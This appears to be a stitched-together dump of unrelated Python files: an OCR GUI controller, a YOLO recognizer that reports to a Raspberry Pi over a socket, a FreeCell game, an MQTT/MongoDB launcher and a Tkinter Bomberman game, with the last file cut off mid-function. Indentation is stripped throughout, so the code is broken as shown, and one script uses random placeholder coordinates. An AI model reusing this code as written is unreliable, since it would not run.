self.curr_thread = main_thread
main_thread.start()
while True:
if self.daemon_thread is None or not main_thread.is_alive():
break
time.sleep(60)
found, _, pos = self.gui. check_any(ImagePathAndProps.VERIFICATION_VERIFY_TITLE_IMAGE_PATH.value)
if found:
found, _, pos = self.gui.check_any(ImagePathAndProps.VERIFICATION_CLOSE_REFRESH_OK_BUTTON_IMAGE_PATH.value)
if not found:
stop_thread(main_thread)
time.sleep(1)
main_thread = threading.Thread(target=fn)
self.curr_thread = main_thread
main_thread.start()
daemon_thread = threading.Thread(target=run)
daemon_thread.start()
self.daemon_thread = daemon_thread
|
tesseract_controller.py
|
import threading
import time
from functools import partial
from logging import getLogger
from pathlib import Path
from kivymd.toast import toast
from kivymd.uix.button import MDFlatButton
from kivymd.uix.dialog import MDDialog
from kivymd.uix.filemanager import MDFileManager
from kivymd.uix.menu import MDDropdownMenu
from kivymd.uix.textfield import MDTextField
from tesseractXplore.app import alert, get_app
from tesseractXplore.controllers import Controller
from tesseractXplore.recognizer import recognize
from tesseractXplore.tessprofiles import write_tessprofiles
logger = getLogger().getChild(__name__)
class TesseractController(Controller):
""" Controller class to manage image selector screen """
def __init__(self, screen):
super().__init__(screen)
self.screen = screen
self.psms = [' 0 Orientation and script detection (OSD) only.',
' 1 Automatic page segmentation with OSD.',
' 2 Automatic page segmentation, but no OSD, or OCR. (not implemented)',
' 3 Fully automatic page segmentation, but no OSD. (Default)',
' 4 Assume a single column of text of variable sizes.',
' 5 Assume a single uniform block of vertically aligned text.',
' 6 Assume a single uniform block of text.', ' 7 Treat the image as a single text line.',
' 8 Treat the image as a single word.', ' 9 Treat the image as a single word in a circle.',
' 10 Treat the image as a single character.',
' 11 Sparse text. Find as much text as possible in no particular order.',
' 12 Sparse text with OSD.',
' 13 Raw line. Treat the image as a single text line, bypassing hacks that are Tesseract-specific.']
self.oems = [' 0 Legacy engine only.', ' 1 Neural nets LSTM engine only.',
' 2 Legacy + LSTM engines.', ' 3 Default, based on what is available.']
self.init_dropdown()
self.tessprofile_menu = screen.tessprofile_menu
self.output_manager = MDFileManager(
exit_manager=self.exit_output_manager,
select_path=self.select_output,
ext=[""],
)
self.selected_output_folder = None
self.screen.recognize_button_fst.bind(on_release=self.recognize_thread)
self.screen.recognize_button_snd.bind(on_release=self.recognize_thread)
self.screen.pause_button_fst.bind(on_press=self.stop_rec)
self.screen.pause_button_snd.bind(on_press=self.stop_rec)
self.screen.model.bind(on_release=get_app().image_selection_controller.get_model)
#elf.modelinfos = get_modelinfos()
self.print_on_screen = False
self.ocr_event = None
self.ocr_stop = False
self.last_rec_time = time.time()
# Context menu
self.screen.context_menu.ids.recognize_ctx.bind(on_release=self.recognize_single_thread)
# Load default settings
self.load_default_settings()
def load_default_settings(self):
for profile, profileparam in get_app().tessprofiles.items():
if profileparam['default'] == True:
self.load_tessprofile(profileparam)
def stop_rec(self, instance):
""" Unschedule progress event and log total execution time """
if self.ocr_event:
self.ocr_stop = True
logger.info(f'Recognizer: Canceled!')
def init_dropdown(self):
screen = self.screen
# Init dropdownsettingsmenu
self.psm_menu = self.create_dropdown(screen.psm, [{"viewclass":"OneLineListItem", 'text': 'PSM: ' + psm, 'on_release': partial(self.set_psm, 'PSM: ' + psm)} for psm in self.psms])
self.oem_menu = self.create_dropdown(screen.oem, [{"viewclass":"OneLineListItem", 'text': 'OEM: ' + oem, 'on_release': partial(self.set_oem, 'OEM: ' + oem)} for oem in self.oems])
def disable_rec(self, instance, *args):
self.screen.recognize_button_fst.disabled = True
self.screen.recognize_button_snd.disabled = True
self.screen.pause_button_fst.disabled = False
self.screen.pause_button_snd.disabled = False
def enable_rec(self, instance, *args):
self.screen.recognize_button_fst.disabled = False
self.screen.recognize_button_snd.disabled = False
self.screen.pause_button_fst.disabled = True
self.screen.pause_button_snd.disabled = True
def recognize_thread(self, instance, *args, file_list=None, profile=None):
self.disable_rec(instance, *args)
self.ocr_event = threading.Thread(target=self.recognize, args=(instance, args),
kwargs={'file_list': file_list, 'profile': profile})
self.ocr_event.setDaemon(True)
self.ocr_event.start()
return self.ocr_event
def recognize_single_thread(self, instance, *args, file_list=None, profile=None):
self.disable_rec(instance, *args)
instance.parent.hide()
self.ocr_single_event = threading.Thread(target=self.recognize, args=(instance, args),
kwargs={'file_list': [instance.selected_image.original_source],'profile': profile})
self.ocr_single_event.setDaemon(True)
self.ocr_single_event.start()
return self.ocr_single_event
def recognize(self, instance, *args, file_list=None, profile=None):
""" Recognize image with tesseract """
if profile is None:
profile = {}
if file_list is None:
file_list = get_app().image_selection_controller.file_list
if not file_list:
alert(f'Select images to recognize')
self.enable_rec(instance)
return
if instance is not None and instance._ButtonBehavior__touch_time < self.last_rec_time:
self.enable_rec(instance)
return
logger.info(f'Main: Recognize {len(file_list)} images')
# metadata_settings = get_app().metadata
# TODO: Handle write errors (like file locked) and show dialog
# file_list = get_app().image_selection_controller
model = profile.get("model", "eng" if self.screen.model.current_item == '' else self.screen.model.current_item.split(": ")[1].strip())
psm = profile.get("psm", "3" if self.screen.psm.current_item == '' else self.screen.psm.current_item.split(": ")[1].strip().split(' ',1)[0])
oem = profile.get("oem", "3" if self.screen.oem.current_item == '' else self.screen.oem.current_item.split(": ")[1].strip().split(' ',1)[0])
outputformats = profile.get("outputformats", self.active_outputformats())
print_on_screen = profile.get("print_on_screen", self.screen.print_on_screen_chk.active)
groupfolder = profile.get("groupfolder", self.screen.groupfolder.text)
subfolder = profile.get("subfolder", self.screen.subfolder_chk.active)
proc_files, outputnames = recognize(file_list, model=model, psm=psm, oem=oem, tessdatadir=get_app().settings_controller.tesseract['tessdatadir'],
output_folder=self.selected_output_folder, outputformats=outputformats,
print_on_screen=print_on_screen, subfolder=subfolder, groupfolder=groupfolder)
toast(f'{proc_files} images recognized')
self.last_rec_time = time.time() + 2
get_app().image_selection_controller.file_chooser._update_files()
self.enable_rec(instance)
# Update image previews with new metadata
# previews = {img.metadata.image_path: img for img in get_app().image_selection_controller.image_previews.children}
# for metadata in all_metadata:
# previews[metadata.image_path].metadata = metadata
def active_outputformats(self):
return [outputformat for outputformat in ['txt', 'hocr', 'alto', 'pdf', 'tsv'] if
self.screen[outputformat].state == 'down']
def on_tesssettings_click(self, *args):
self.tessprofile_menu.show(*get_app().root_window.mouse_pos)
def search_tessprofile(self):
get_app().tessprofiles_controller.set_profiles()
get_app().switch_screen('tessprofiles')
def load_tessprofile(self, tessprofileparams):
self.screen.model.set_item(f"Model: {tessprofileparams.get('model', 'eng')}")
self.screen.psm.set_item(f"PSM: {self.psms[int(tessprofileparams['psm'])]}")
self.screen.oem.set_item(f"OEM: {self.oems[int(tessprofileparams['oem'])]}")
for outputformat in ['txt', 'hocr', 'alto', 'pdf', 'tsv']:
if outputformat in tessprofileparams['outputformat']:
self.screen[outputformat.strip()].state = 'down'
else:
self.screen[outputformat.strip()].state = 'normal'
self.screen.print_on_screen_chk.active = True if tessprofileparams['print_on_screen'] == "True" else False
if tessprofileparams['outputdir'] != "":
self.screen.output.set_item(f"Selected output directory: {tessprofileparams['outputdir']}")
else:
self.screen.output.text = ''
self.screen.output.set_item('')
self.screen.output.text = f"Select output directory (default: input folder)"
self.screen.subfolder_chk.active = True if tessprofileparams['subfolder'] == "True" else False
self.screen.groupfolder.text = tessprofileparams['groupfolder']
return
def save_tessprofile_dialog(self):
def close_dialog(instance, *args):
instance.parent.parent.parent.parent.dismiss()
dialog = MDDialog(title="Name of the profile",
type='custom',
auto_dismiss=False,
content_cls=MDTextField(text="",mode="rectangle"),
buttons=[
MDFlatButton(
text="SAVE", on_release=self.save_tessprofile
),
MDFlatButton(
text="DISCARD", on_release=close_dialog
),
],
)
if get_app()._platform not in ['win32', 'win64']:
# TODO: Focus function seems buggy in win
dialog.content_cls.focused = True
dialog.open()
def save_tessprofile(self, instance):
tessprofilename = instance.parent.parent.parent.parent.content_cls.text
if tessprofilename != '':
get_app().tessprofiles[tessprofilename] = {
"model": self.screen.model.current_item.split(" ")[1] if self.screen.model.current_item.split(" ")[
0] == "Model:" else "eng",
"psm": "".join([char for char in self.screen.psm.text if char.isdigit()]),
"oem": "".join([char for char in self.screen.oem.text if char.isdigit()]),
"outputformat": self.active_outputformats(),
"print_on_screen": str(self.screen.print_on_screen_chk.active),
"outputdir": "" if self.screen.output.text.split(" ")[0] != "Selected" else
self.screen.output.text.split(" ")[3],
"groupfolder": self.screen.groupfolder.text,
"subfolder": str(self.screen.subfolder_chk.active),
"default": False
}
write_tessprofiles(get_app().tessprofiles)
instance.parent.parent.parent.parent.dismiss()
def reset_settings(self):
# TODO: Rework resetting
self.reset_text(self.screen.model)
self.reset_text(self.screen.psm)
self.reset_text(self.screen.oem)
self.reset_ouputformat()
self.screen.print_on_screen_chk.active = False
self.selected_output_folder = None
self.screen.output.text = ''
self.screen.output.set_item('')
self.screen.output.text = f"Select output directory (default: input folder)"
self.screen.subfolder_chk.active = False
self.screen.groupfolder.text = ''
def reset_text(self, instance):
instance.text = instance.text + '!'
instance.set_item('')
instance.text = instance.text[:-1]
def reset_ouputformat(self):
self.screen.txt.state = 'normal'
self.screen.alto.state = 'normal'
self.screen.hocr.state = 'normal'
self.screen.pdf.state = 'normal'
self.screen.tsv.state = 'normal'
def create_dropdown(self, caller, item):
menu = MDDropdownMenu(caller=caller,
items=item,
position='bottom',
width_mult=20)
menu.bind()
return menu
def set_psm(self, text):
self.screen.psm.set_item(text)
self.psm_menu.dismiss()
def set_oem(self, text):
self.screen.oem.set_item(text)
self.oem_menu.dismiss()
def select_output(self, path=None):
'''It will be called when you click on the file name
or the catalog selection button.
:type path: str;
:param path: path to the selected directory or file;
'''
if path is None: return
self.selected_output_folder = path
self.screen.output.text = f"Selected output directory: {path}"
self.exit_output_manager()
def select_output_folder(self):
if get_app().image_selection_controller.file_list != []:
self.output_manager.show(str(Path(get_app().image_selection_controller.file_list[0]).parent.resolve()))
else:
self.output_manager.show("/")
def exit_output_manager(self, *args):
'''Called when the user reaches the root of the directory tree.'''
self.output_manager.close()
|
imgrec.py
|
import darknet
import cv2
import numpy as np
import imutils
import random
import time
#Setup sending of string and receiving of coordinate
import socket
import threading
PORT = 5051
FORMAT = 'utf-8'
SERVER = '192.168.32.32'
ADDR = (SERVER, PORT)
#robot_coord = 'empty'
ir_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
ir_socket.connect(ADDR)
WEIGHT_FILE_PATH = 'yolov4tiny.weights'
CONFIG_FILE_PATH = './cfg/custom-yolov4-tiny-detector.cfg'
DATA_FILE_PATH = './cfg/coco.data'
RPI_IP = '192.168.32.32'
MJPEG_STREAM_URL = 'http://' + RPI_IP + '/html/cam_pic_new.php'
YOLO_BATCH_SIZE = 4
THRESH = 0.85 #may want to lower and do filtering for specific images later
def retrieve_img():
#captures a frame from mjpeg stream
#returns opencv image
cap = cv2.VideoCapture(MJPEG_STREAM_URL)
ret, frame = cap.read()
return frame
def image_detection(image, network, class_names, class_colors, thresh):
# Darknet doesn't accept numpy images.
# Create one with image we reuse for each detect
#Modified from darknet_images.py
#Takes in direct image instead of path
width = darknet.network_width(network)
height = darknet.network_height(network)
darknet_image = darknet.make_image(width, height, 3)
image_rgb = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
image_resized = cv2.resize(image_rgb, (width, height),
interpolation=cv2.INTER_LINEAR)
darknet.copy_image_from_bytes(darknet_image, image_resized.tobytes())
detections = darknet.detect_image(network, class_names, darknet_image, thresh=thresh)
darknet.free_image(darknet_image)
image = darknet.draw_boxes(detections, image_resized, class_colors)
return cv2.cvtColor(image, cv2.COLOR_BGR2RGB), detections
def show_all_images(frame_list):
for index, frame in enumerate(frame_list):
frame = imutils.resize(frame, width=400)
cv2.imshow('Image' + str(index), frame)
if cv2.waitKey() & 0xFF == ord('q'):
cv2.destroyAllWindows()
def leading_zero(int_string):
if int(int_string) < 10:
return '0' + int_string
else:
return int_string
def test_detect():
frame = cv2.imread('C:\\Users\\CZ3004\\Downloads\\images\\multi_142.jpeg')
#frame = retrieve_img()
network, class_names, class_colors = darknet.load_network(
CONFIG_FILE_PATH,
DATA_FILE_PATH,
WEIGHT_FILE_PATH,
YOLO_BATCH_SIZE
)
image, detections = image_detection(frame, network, class_names, class_colors, THRESH)
print(detections)
cv2.imshow('Inference', image)
if cv2.waitKey() & 0xFF == ord('q'):
cv2.destroyAllWindows()
cv2.imwrite('./result.jpeg', image)
def continuous_detect():
#use dictionary to store results
#structure: dictionary, tuple of (id, confidence,(bbox))
#bbox: x,y,w,h
#global robot_coord
#local_robot_coord = 'empty'
#if robot_coord != 'empty':
# local_robot_coord = robot_coord
# robot_coord = 'empty'
#local_robot_coord = '(1,1)|N'
results = {}
images = {}
network, class_names, class_colors = darknet.load_network(
CONFIG_FILE_PATH,
DATA_FILE_PATH,
WEIGHT_FILE_PATH,
YOLO_BATCH_SIZE
)
try:
print('Image recognition started!')
while True:
#print('Robot coordinates: ' + local_robot_coord)
cv2.waitKey(50)
frame = retrieve_img()
image, detections = image_detection(frame, network, class_names, class_colors, THRESH)
#structure: in a list, (id, confidence, (bbox))
#[('9', '99.72', (377.555419921875, 147.49517822265625, 87.70740509033203, 173.86444091796875)), ('7', '99.95', (43.562461853027344, 134.47283935546875, 91.14225006103516, 181.6890411376953)), ('8', '99.96', (214.2314453125, 143.147216796875, 85.68460845947266, 166.68231201171875))]
#index: 0-id 1-confidence 2-bbox
#bbox: x,y,w,h
for i in detections:
id = i[0] #string
confidence = i[1] #string
bbox = i[2] #tuple
print('ID detected: ' + id, ', confidence: ' + confidence)
if id in results:
print('ID has been detected before')
if float(confidence) > float(results[id][1]):
print('Confidence higher. Replacing existing image.')
del results[id] #remove existing result from dict
del images[id] #remove existing img from dict
results[id] = i #add new result to dict. DUPLICATE ID IN VALUE PAIR!
images[id] = image #add new result to dict
else:
print('Confidence lower. Keeping existing image.')
pass
else:
print('New ID. Saving to results and image dict.')
results[id] = i
images[id] = image
except KeyboardInterrupt:
print('End of image recognition.')
#generate string
img_rec_result_string = '{'
print("Detection results:")
for i in results:
#here you would pull actual coordinates and compute
#coordinates should already been loaded and accessible through a variable
x_coordinate = random.randint(0,14)
y_coordinate = random.randint(0,19)
id_coordinate_str = '(' + i + ',' + str(x_coordinate) + ',' + str(y_coordinate) + '),'
img_rec_result_string += id_coordinate_str
# Android: NumberIDABXXYY
# ANDROID STRING
android_string ='NumberID'
android_id = leading_zero(i)
android_x = leading_zero(str(x_coordinate))
android_y = leading_zero(str(y_coordinate))
android_string += android_id + android_x + android_y
# send string to android
message = android_string.encode(FORMAT)
ir_socket.send(message)
print('Sent ' + android_string + ' to Android.')
time.sleep(0.1)
#finish send string to android
print('ID: ' + i + ', Coordinates: (' + str(x_coordinate) +',' + str(y_coordinate) + ')' + ', Confidence: ' + results[i][1])
if img_rec_result_string[-1] == ',':
img_rec_result_string = img_rec_result_string[:-1]
img_rec_result_string += '}'
print(img_rec_result_string)
android_string_all = 'ImageID' + img_rec_result_string
message = android_string_all.encode(FORMAT)
ir_socket.send(message)
print('Sent ' + android_string_all + ' to Android.')
#generate image mosaic
result_frame_list = list(images.values())
show_all_images(result_frame_list)
def readRPI():
while True:
msg = ir_socket.recv(1024)
if msg:
print('Received coordinates')
robot_coord = msg
if __name__ == "__main__":
#test_detect()
#read_rpi_thread = threading.Thread(target = readRPI, name = "read_rpi_thread")
#read_rpi_thread.daemon = True
#print('Starting RPi comm thread...')
#read_rpi_thread.start()
#print('RPi comm thread started.')
continuous_detect()
|
game.py
|
import Queue
import random
import events
from events import *
from gui import FreeCellGUI
from logic import FreeCellLogic
from network import FreeCellNetworking
class FreeCellGame(object):
def __init__(self, seed=None, debug=False, networking=False):
"""
:param int seed: Seed
:param bool debug: Debug enabled
:param bool networking: Networking enabled
"""
self.event_dispatch = events.event_dispatch
self.logic = FreeCellLogic()
self.gui = FreeCellGUI(self.logic)
self.input = self.gui.get_input()
self.stats = None
self.seed = None
self.debug = debug
self.networking = None
self.shutdown_event = threading.Event()
self.quit_message = None
self.state = ""
self.threads = []
input_thread = threading.Thread(target=self.input.run)
input_thread.daemon = True
self.threads.append(input_thread)
if networking:
self.networking = FreeCellNetworking()
self.threads.append(threading.Thread(target=self.networking.run, args=(self.shutdown_event,)))
else:
event = SeedEvent(seed=seed or random.randint(0, 0xFFFFFFFF))
self.event_dispatch.send(event)
def start(self, stdscr):
if self.debug:
from pydevd import pydevd
from debug import DEBUG_HOST, DEBUG_PORT
pydevd.settrace(DEBUG_HOST, port=DEBUG_PORT, suspend=False)
if self.networking is not None:
self.event_dispatch.send(ScreenChangeEvent(screen="login"))
self.event_dispatch.register(self.finish, ["FinishEvent"])
self.event_dispatch.register(self.quit, ["QuitEvent"])
self.event_dispatch.register(self.set_seed, ["SeedEvent"])
self.event_dispatch.register(self.handle_input, ["InputEvent"])
for thread in self.threads:
thread.start()
self.shutdown_event.set()
self.logic.start()
self.input.start(stdscr)
self.gui.start(stdscr)
self.game_loop()
def set_seed(self, event):
self.state = "seeded"
self.seed = event.seed
self.logic.load_seed(self.seed)
self.event_dispatch.send(ScreenChangeEvent(screen="game"))
def handle_input(self, event):
if event.key == ord('?'):
width = 44
height = 12
y = 1
x = 0
import curses
win = curses.newwin(height, width, y, x)
self.gui.set_screen("help")
self.gui.screens[self.gui.screen].set_window(win)
elif event.key == ord('Q'):
self.event_dispatch.send(FinishEvent(won=False))
def game_loop(self):
MAX_FPS = 30
S_PER_FRAME = 1.0/MAX_FPS
while self.shutdown_event.is_set():
start = time.time()
try:
self.event_dispatch.update(.1)
# TODO: have GUI only render on changed screen
self.gui.render()
elapsed = time.time() - start
if elapsed < S_PER_FRAME:
time.sleep(S_PER_FRAME-elapsed)
except KeyboardInterrupt:
self.event_dispatch.send(FinishEvent(won=False), priority=1)
def finish(self, event):
if self.seed is not None:
self.stats = Stats(seed=self.seed, time=time.time()-self.logic.start_time, moves=self.logic.moves, undos=self.logic.undos, won=self.logic.is_solved())
self.event_dispatch.send(self.stats)
if self.stats.won:
message = "You won!"
else:
message = "Better luck next time."
else:
message = ""
self.event_dispatch.send(QuitEvent(message=message))
def quit(self, event):
self.quit_message = event.message
self.shutdown_event.clear()
|
main.py
|
import queue
from libs.mongo import Mongo
from libs.mqtt import MQTT
from libs.configuration import Configuration
from queue import Queue
from signal import pause
import threading
if __name__ == "__main__":
configuration = Configuration()
__queue = Queue()
mongo = Mongo(
mongoConfig = configuration.AppConfiguration["MONGODB"],
queue = __queue)
mqtt = MQTT(
mqttConfig = configuration.AppConfiguration["MQTT"],
queue = __queue)
mongo.connect()
mqtt.run()
th = []
th.append(threading.Thread( target = mongo.run, ))
th.append(threading.Thread( target = mqtt.run, ))
for t in th:
t.daemon = True
t.start()
try:
pause()
except KeyboardInterrupt:
pass
mqtt.stop()
mongo.disconnect()
|
teste.py
|
# -*- coding: utf-8 -*-
import Tkinter as tk
from Tkinter import *
from PIL import Image, ImageTk
import threading
import os
from threading import Thread
import time
from random import randint
class Bomberman(Frame):
def __init__(self, parent,numeros, con, nick):
Frame.__init__(self, parent)
self.fogo=[]
numeros = numeros.split("/")
self.cli=con
self.sou=0
self.nick=nick
rows=15
columns=15
self.blocosespecial = []
#Frame.__init__(self,parent)
cont=1
self.blocos=[]
self._widgets = []
for row in range(rows):
current_row = []
for column in range(columns):
label = Label(self)
if row == 0 or row == 14:
label.configure(bg="gray")
label.grid(row=row, column=column, sticky="nsew")
elif column == 0 or column == 14:
label.configure(bg="gray")
label.grid(row=row, column=column, sticky="nsew")
else:
if row % 2 == 0 and column % 2 == 0:
label.configure(bg="gray")
label.grid(row=row, column=column, sticky="nsew")
else:
true = int(numeros[cont])
if row == 1 and column == 1:
true = 1
if row == 2 and column == 1:
true = 1
if row == 1 and column == 2:
true = 1
if row == 13 and column == 13:
true = 1
if row == 12 and column == 13:
true = 1
if row == 13 and column == 12:
true = 1
if true == 0:
self.blocos.append((column,row))
label.configure(bg="blue")
label.grid(row=row, column=column, sticky="nsew")
elif true == 9:
self.blocos.append((column,row))
self.blocosespecial.append((column,row))
label.configure(bg="blue")
label.grid(row=row, column=column, sticky="nsew")
else:
label.configure(bg="green")
label.grid(row=row, column=column, sticky="nsew")
cont+=1
current_row.append(label)
self._widgets.append(current_row)
for column in range(columns):
self.grid_columnconfigure(column, pad=28)
for row in range(rows):
self.grid_rowconfigure(row, pad=14)
self.pack(fill=BOTH, expand=1)
parent.protocol("WM_DELETE_WINDOW", self.close)
self.conexao()
self.tela(parent)
Thread(target=self.conexao2).start()
def tela(self,parent):
#self.img2 = ImageTk.PhotoImage(Image.open('tartaruga.png'))
#self.img = Label(self, image=self.img2)
#self.img.image=self.img2
#self.img.place(x=32,y=32)
#parent.bind("<Down>",self.baixo)
#parent.bind("<Up>",self.cima)
#parent.bind("<Left>",self.esquerda)
#parent.bind("<Right>",self.direita)
#parent.bind("<space>",self.bomba)
self.play1 = player(self,parent, self.sou)
self.play2 = player(self,parent, self.sou,self.play1)
def conexao(self):
self.cli.enviar("quemjoga")
teste = self.cli.receber()
self.sou = teste
#texto = "Você joga por "+teste
#toplevel = Toplevel()
#label1 = Label(toplevel, text=texto, height=5, width=30)
#label1.pack(side="top")
def conexao2(self):
testeeeeee=[]
while 1:
resposta = self.cli.receber()
columns=2
if resposta[:4] == "nick":
ranking=resposta.split("\n")
ranking2=[]
for i in range(len(ranking)-1):
if i != 0:
ranking2.append("tempo="+ranking[i].split(";")[1].split("=")[1]+";nick="+ranking[i].split(";")[0].split("=")[1])
else:
ranking2.append(ranking[0])
ranking2.sort()
toplevel = Toplevel(bg="black")
toplevel.title("Ranking")
widgets=[]
for row in range(len(ranking)-1):
current_row = []
numteste=1
vasf=0
for column in range(columns):
if row == 0 and vasf == 0:
numteste=0
if row == 0 and vasf == 1:
numteste=1
label = Label(toplevel,borderwidth=2,width=20,text=ranking2[row].split(";")[numteste].split("=")[1])
label.configure(bg="gray")
label.grid(row=row, column=column, sticky="nsew",padx=1, pady=1)
vasf=1
numteste-=1
current_row.append(label)
widgets.append(current_row)
self.play1.img.destroy()
self.play2.img.destroy()
elif len(resposta) > 3:
testeeeeee.append(resposta)
for x in testeeeeee:
for i in range(0,len(x),3):
texto=x[i:i+3]
resposta2=texto
if resposta2 == "000": #000
self.play2.baixo("baixo")
elif resposta2 == "001": #001
self.play2.cima("cima")
elif resposta2 == "010": #010
self.play2.esquerda("esquerda")
elif resposta2 == "011":#011
self.play2.direita("direita")
elif resposta2 == "100":#100
self.play2.bomba("bomba")
testeeeeee.remove(x)
else:
if resposta == "000": #000
self.play2.baixo("baixo")
elif resposta == "001": #001
self.play2.cima("cima")
elif resposta == "010": #010
self.play2.esquerda("esquerda")
elif resposta == "011":#011
self.play2.direita("direita")
elif resposta == "100":#100
self.play2.bomba("bomba")
def close(self):
os._exit(0)
class player():
def __init__(self,teste,parent,play,check=None):
self.testabomba=1
self.master = teste
self.outro = check
self.play = play
if play == "primeiro":
if check == None:
self.img2 = ImageTk.PhotoImage(Image.open('/usr/bin/play13.gif'))
self.img = Label(self.master, bg="green",image=self.img2)
self.img.image=self.img2
self.img.place(x=32,y=32)
self.master.update()
self.lastx=self.img.winfo_x()
self.lasty=self.img.winfo_y()
else:
self.img2 = ImageTk.PhotoImage(Image.open('/usr/bin/play23.gif'))
self.img = Label(self.master, bg="green",image=self.img2)
self.img.image=self.img2
self.img.place(x=416,y=416)
self.master.update()
self.lastx=self.img.winfo_x()
self.lasty=self.img.winfo_y()
else:
if check == None:
self.img2 = ImageTk.PhotoImage(Image.open('/usr/bin/play23.gif'))
self.img = Label(self.master, bg="green",image=self.img2)
self.img.image=self.img2
self.img.place(x=416,y=416)
self.master.update()
self.lastx=self.img.winfo_x()
self.lasty=self.img.winfo_y()
else:
self.img2 = ImageTk.PhotoImage(Image.open('/usr/bin/play13.gif'))
self.img = Label(self.master, bg="green", image=self.img2)
self.img.image=self.img2
self.img.place(x=32,y=32)
self.master.update()
self.lastx=self.img.winfo_x()
self.lasty=self.img.winfo_y()
if check == None:
parent.bind("<Down>",self.baixo)
parent.bind("<Up>",self.cima)
parent.bind("<Left>",self.esquerda)
parent.bind("<Right>",self.direita)
parent.bind("<space>",self.bomba)
self.inicio = int(time.strftime("%s"))
def baixo(self,event):
testando = self.checaposicao(self.img.winfo_x(),self.img.winfo_y()+32,"x")
if testando == True:
if event != "baixo":
self.master.cli.enviar("000")
self.lastx=self.img.winfo_x()
self.lasty=self.img.winfo_y()+32
if self.play == "primeiro":
if self.outro == None:
img2 = ImageTk.PhotoImage(Image.open('/usr/bin/play13.gif'))
else:
img2 = ImageTk.PhotoImage(Image.open('/usr/bin/play23.gif'))
else:
if self.outro == None:
img2 = ImageTk.PhotoImage(Image.open('/usr/bin/play23.gif'))
else:
img2 = ImageTk.PhotoImage(Image.open('/usr/bin/play13.gif'))
self.img.configure(image=img2)
self.img.image = img2
self.img.place(x=self.img.winfo_x(),y=self.img.winfo_y()+32)
elif testando == "morreu1" or testando == "morreu2":
if event != "baixo":
self.master.cli.enviar("000")
self.lastx=self.img.winfo_x()
self.lasty=self.img.winfo_y()+32
if self.play == "primeiro":
if self.outro == None:
img2 = ImageTk.PhotoImage(Image.open('/usr/bin/play13.gif'))
else:
img2 = ImageTk.PhotoImage(Image.open('/usr/bin/play23.gif'))
else:
if self.outro == None:
img2 = ImageTk.PhotoImage(Image.open('/usr/bin/play23.gif'))
else:
img2 = ImageTk.PhotoImage(Image.open('/usr/bin/play13.gif'))
self.img.configure(image=img2)
self.img.image = img2
self.img.place(x=self.img.winfo_x(),y=self.img.winfo_y()+32)
t1 = threading.Thread(target=self.morreu, args=[testando])
t1.start()
self.master.update()
def morreu(self,teste):
self.fim = int(time.strftime("%s"))
if teste == "morreu1" and self.master.sou == "primeiro":
texto = "Você Perdeu"
toplevel = Toplevel()
label1 = Label(toplevel, text=texto, height=5, width=30)
label1.pack(side="top")
time.sleep(5)
self.master.cli.enviar("acabou")
toplevel.destroy()
#self.master.close()
elif teste == "morreu1" and self.master.sou == "segundo":
score=self.fim-self.inicio
score=self.transform(score)
self.master.cli.enviar("nick="+self.master.nick+";tempo="+score)
texto = "Você Ganhou"
toplevel = Toplevel()
label1 = Label(toplevel, text=texto, height=5, width=30)
label1.pack(side="top")
time.sleep(5)
toplevel.destroy()
elif teste == "morreu2" and self.master.sou == "segundo":
texto = "Você Perdeu"
toplevel = Toplevel()
label1 = Label(toplevel, text=texto, height=5, width=30)
label1.pack(side="top")
time.sleep(5)
self.master.cli.enviar("acabou")
toplevel.destroy()
else:
score=self.fim-self.inicio
score=self.transform(score)
self.master.cli.enviar("nick="+self.master.nick+";tempo="+score)
texto = "Você Ganhou"
toplevel = Toplevel()
label1 = Label(toplevel, text=texto, height=5, width=30)
label1.pack(side="top")
time.sleep(5)
toplevel.destroy()
def transform(self,segundos):
segundos_rest = segundos % 86400
horas = segundos_rest // 3600
segundos_rest = segundos_rest % 3600
minutos = segundos_rest // 60
segundos_rest = segundos_rest % 60
if len(str(horas)) == 1:
horas="0"+str(horas)
else:
horas=str(horas)
if len(str(minutos)) == 1:
minutos="0"+str(minutos)
else:
minutos=str(minutos)
if len(str(segundos_rest)) == 1:
segundos_rest="0"+str(segundos_rest)
else:
segundos_rest=str(segundos_rest)
return horas+":"+minutos+":"+segundos_rest
def cima(self,event):
testando = self.checaposicao(self.img.winfo_x(),self.img.winfo_y()-32,"x")
if testando == True:
if event != "cima":
self.master.cli.enviar("001")
if self.play == "primeiro":
if self.outro == None:
img2 = ImageTk.PhotoImage(Image.open('/usr/bin/play11.gif'))
else:
img2 = ImageTk.PhotoImage(Image.open('/usr/bin/play21.gif'))
else:
if self.outro == None:
img2 = ImageTk.PhotoImage(Image.open('/usr/bin/play21.gif'))
else:
img2 = ImageTk.PhotoImage(Image.open('/usr/bin/play11.gif'))
self.img.configure(image=img2)
self.img.image = img2
self.lastx=self.img.winfo_x()
self.lasty=self.img.winfo_y()-32
self.img.place(x=self.img.winfo_x(),y=self.img.winfo_y()-32)
elif testando == "morreu1" or testando == "morreu2":
if event != "cima":
self.master.cli.enviar("001")
if self.play == "primeiro":
if self.outro == None:
img2 = ImageTk.PhotoImage(Image.open('/usr/bin/play11.gif'))
else:
img2 = ImageTk.PhotoImage(Image.open('/usr/bin/play21.gif'))
else:
if self.outro == None:
img2 = ImageTk.PhotoImage(Image.open('/usr/bin/play21.gif'))
else:
img2 = ImageTk.PhotoImage(Image.open('/usr/bin/play11.gif'))
self.img.configure(image=img2)
self.img.image = img2
self.lastx=self.img.winfo_x()
self.lasty=self.img.winfo_y()-32
self.img.place(x=self.img.winfo_x(),y=self.img.winfo_y()-32)
t1 = threading.Thread(target=self.morreu, args=[testando])
t1.start()
self.master.update()
def esquerda(self,event):
testando = self.checaposicao(self.img.winfo_x()-32,self.img.winfo_y(),"y")
if testando == True:
if event != "esquerda":
self.master.cli.enviar("010")
if self.play == "primeiro":
if self.outro == None:
img2 = ImageTk.PhotoImage(Image.open('/usr/bin/play14.gif'))
else:
img2 = ImageTk.PhotoImage(Image.open('/usr/bin/play24.gif'))
else:
if self.outro == None:
img2 = ImageTk.PhotoImage(Image.open('/usr/bin/play24.gif'))
else:
img2 = ImageTk.PhotoImage(Image.open('/usr/bin/play14.gif'))
self.img.configure(image=img2)
self.img.image = img2
self.lastx=self.img.winfo_x()-32
self.lasty=self.img.winfo_y()
self.img.place(x=self.img.winfo_x()-32,y=self.img.winfo_y())
elif testando == "morreu1" or testando == "morreu2":
if event != "esquerda":
self.master.cli.enviar("010")
if self.play == "primeiro":
if self.outro == None:
img2 = ImageTk.PhotoImage(Image.open('/usr/bin/play14.gif'))
else:
